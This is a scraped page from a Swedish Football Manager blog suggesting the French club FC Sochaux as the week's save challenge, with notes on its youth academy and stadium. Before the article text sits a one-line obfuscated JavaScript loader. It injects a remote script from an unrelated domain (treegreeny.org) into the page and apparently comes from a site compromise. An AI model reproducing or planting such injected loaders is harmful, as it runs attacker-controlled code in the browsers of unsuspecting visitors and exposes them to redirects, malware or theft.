;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: FC Sochaux – FMSweden
Meny Stäng

Veckans inspiration: FC Sochaux

Denna veckas tips handlar om den franska klubben Football Club Sochaux-Montbéliard som för närvarande spelar i Ligue 2 efter att ha blivit nedflyttade från högstaligan för några år sedan. Jag vill passa på att tacka forummedlemmarna JOSSTICK och Niklas7 då laget diskuterades som en tänkbar klubb på den förstnämndes stream häromdagen (ber om ursäkt om jag glömt någon mer som pratade om Sochaux i chatten där, berätta gärna det i sådana fall).

Även denna gång handlar det om ett lag med ett läckert klubbmärke (se nedan) som spelar i andradivisionen i en av Europas fem största ligor. Sochaux är kända för sin ungdomsakademi som regelbundet klassas som de vassaste i Frankrike och det märks även på FM med goda förutsättningar att kunna fylla A-laget med lovande talanger från de egna leden. De spelar på en arena som tar in cirka 20 000 åskådare och har tagit ett par inhemska cuptitlar under 2000-talet. Redan från start finns det några talangfulla spelare med bra potential som man kan försöka bygga laget kring. Kan du lyckas etablera laget i Ligue 1 för att på sikt utmana om Europaplatserna? Lycka till med uppgiften!

 

Please wait...

Liknande Inlägg

1 kommentar

Lämna ett svar